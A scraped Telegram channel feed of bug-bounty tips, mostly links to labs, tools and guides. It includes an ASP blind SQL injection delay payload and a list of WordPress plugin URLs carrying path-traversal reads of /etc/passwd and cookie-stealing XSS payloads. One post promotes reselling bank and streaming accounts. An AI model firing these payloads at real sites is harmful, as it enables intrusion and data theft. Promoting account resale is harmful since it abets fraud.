
Telegram channel bugbounty_tech - Bug bounty Tips

2246

🛡️ Cybersecurity enthusiast | 💻 Helping secure the digital world | 🌐 Web App Tester | 🕵️‍♂️ OSINT Specialist Admin: @laazy_hack3r


Bug bounty Tips

XSS lab: https://brutelogic.com.br/gym.php
https://brutelogic.com.br/gym.php?p=gitbook
30 levels


Bug bounty Tips

Password: @redbluehit


Bug bounty Tips

NUCLEI101 FOR BUG BOUNTY CHEATSHEET
Sun, 18 Jun 2023 17:07:46 GMT
https://medium.com/p/3eaf3c35b39


Bug bounty Tips

Read this book after OWASP Top 10
You will learn more vulnerabilities
1 page in 1 day


Bug bounty Tips

Port Forwarding Using Portmap.io (PC)


Bug bounty Tips

🔥Quick NextJS Website Recon Tip by renniepak

A quick way to find "all" paths for Next.js websites:

👇DevTools->Console

console.log(__BUILD_MANIFEST.sortedPages)

javascript:console.log(__BUILD_MANIFEST.sortedPages.join('\n'));


Bug bounty Tips

🚨 Ever wonder why your API calls are getting blocked?

Cross-Origin Resource Sharing (CORS) can be the culprit! When your JavaScript tries to communicate with an API on a different domain, the browser steps in to protect you. CORS ensures that only approved domains can make those requests. Learn how to manage these "preflight" checks and configure your server correctly to allow legitimate cross-origin requests.

Hit save to stay in the know and never let CORS block your code! 🔒

👉 Follow us for more cybersecurity tips and tricks!
🌐 Visit us at www.cipherops.xyz
📲 @cipherops.tech


https://www.instagram.com/p/C_fObBqShyT/?igsh=dWloN2lpeGx0ZHU0


Bug bounty Tips

Some of the DNS tools...


Bug bounty Tips

Tricky ASP blind SQL Injection in a login page.
Payload👇
';%20waitfor%20delay%20'0:0:6'%20--%20


Bug bounty Tips

⚡️WordPress endpoints to look at -
check these if you have these plugins. ⚡️

/wp-content/plugins/./simple-image-manipulator/controller/download.php?filepath=/etc/passwd

/wp-content/plugins/activehelper-livehelp/server/offline.php?MESSAGE=MESSAGE%3C%2Ftextarea%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&DOMAINID=DOMAINID&COMPLETE=COMPLETE&TITLE=TITLE&URL=URL&COMPANY=COMPANY&SERVER=SERVER&PHONE=PHONE&SECURITY=SECURITY&BCC=BCC&EMAIL=EMAIL%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&NAME=NAME%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&

/wp-content/plugins/amministrazione-aperta/wpgov/dispatcher.php?open=../../../../../../../../../../etc/passwd

/wp-content/plugins/anti-plagiarism/js.php?m=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E

/wp-content/plugins/buddypress-component-stats/lib/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd

/wp-content/plugins/dzs-videogallery/admin/upload.php

/wp-content/plugins/e-search/tmpl/title_az.php?title_az=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E

/wp-content/plugins/fancy-product-designer/inc/custom-image-handler.php

/wp-content/plugins/hd-webplayer/playlist.php

/wp-content/plugins/localize-my-post/ajax/include.php?file=../../../../../../../../../../etc/passwd


Bug bounty Tips

Deobfuscation and analysis
of client-side JavaScript code
to detect DOM-based XSS.


Bug bounty Tips

Join the discussion group guys

/channel/bug_hunting_talks


Bug bounty Tips

Today I got an interesting reflected XSS in a Karnataka gov website

/kn where the lang_name param is vulnerable


Bug bounty Tips

Thanks, guys, for this suggestion. I was stuck, but seeing the money and the content provided by Hack The Box Academy, I am planning to first take the CPT, as it covers almost all the topics, and also so many people say that the exam is tougher than OSCP. So after reading all those articles, Reddit suggestions and YouTube reviews, I am planning to first complete the CPT; once done, I will take the OSCP later. And I also suggest this to you guys, only if you are a beginner or an intermediate: first take the alternative courses to OSCP, and once you get things done, you will get confident and later you can pass the OSCP in one go. Because it costs a lot........ 🤑💰


Bug bounty Tips

Later on I will make a group


Bug bounty Tips

Bash challenge: Cmdchallenge.com


Bug bounty Tips

Guide to Using Nuclei: https://medium.com/@learntheshell/guide-to-using-nuclei-9c37869be30e?source=rss------bug_bounty-5


Bug bounty Tips

7 free online #OSINT Tools

GHUNT - Google account info
Sherlock - nickname enumeration
Holehe - search accounts by email
Ignorant - search accounts by phone
Whois domain lookup
WhatsApp profile info
HudsonRock - email leaks lookup

osint.rocks

Tip by twitter.com/0xtechrock

@OsintGit


Bug bounty Tips

What a morning🫡

I started this channel last year in the name of "BugBounty tips by cipherops.xyz"

It took me a total of 10 months to reach 1k subscribers, but I was happy when I saw that, and it took me just 1 month to get 500 subscribers.

All you need to do is just start😄
The best thing of this year..... 💓💓


Bug bounty Tips

SQL Injection Complete Guide


Bug bounty Tips

🔵 How to make money on Telegram {Full Guide} 🔤

1. Start doing Airdrops today! When a new cryptocurrency launches and pays people for small tasks like channel joins and referrals, it is called an Airdrop.
There are many Telegram bots for Airdrops which are legit, like KuCoin, Tomarket etc.

2. Make a channel and start collecting an audience. If you have an audience, then you can sell courses and things, you can earn by ad revenue, you can earn by doing promotions.

There is always an easy way and a hard way for everything. If you want the hard way, then you can make content and share it in the channel with your channel link in the post, so that organic members come when the audience shares your post. OR, the easy way, you can invest some money to buy paid promotions and easily scale up your earnings and reach. (Easy way is better in my view)

3. Now on your channel, you can refer, you can sell, you can promote. Earnings will increase in proportion to activeness in your channel. So NEVER force anyone to join your channel. [It's so cheap]

4. Join public groups and start reselling stuff like bank accounts, OTT accounts, subscriptions, TG accounts or any stuff. The market on Telegram groups is so big. You haven't seen it yet.

5. It's important to keep your mind calm and bring consistency to your work to make it work. So eat healthy, meditate 10 mins daily and live with people who have a good mindset. Your company decides your future.

🙂 Must join our Channel @bugbounty_tech

Give Reactions fast and share post else no more methods 💧


Bug bounty Tips

Mindmap for tryhackme


Bug bounty Tips

https://cyfare.net/

- ExploitDB - Exploits, Shellcodes, Dorks
- Malware Query Engine - Download, Search, Hunt & Intel
- Sandbox - Best Free Deep File Scanner with Unlimited file scans, 100+ yara rules, based on OPSWAT next-gen sandbox


Bug bounty Tips

Blackbox-Fuzzing of IoT Devices Using the Router TL-WR902AC as Example - https://tsmr.eu/blackbox-fuzzing.html


Bug bounty Tips

What are the basic goals of good reconnaissance


Bug bounty Tips

Analysis of CVE-2024-43044 — From file read to RCE in Jenkins through agents

https://blog.convisoappsec.com/en/analysis-of-cve-2024-43044/


Bug bounty Tips

See, it really works: easy 5 min finding


Bug bounty Tips

☄️AutoRecon - a multi-threaded network reconnaissance tool which performs automated enumeration of services.

🔗
https://github.com/Tib3rius/AutoRecon


Bug bounty Tips

Actually I am using a foreign number, so no need to worry if it's banned in India.


Bug bounty Tips

Join my WhatsApp channel
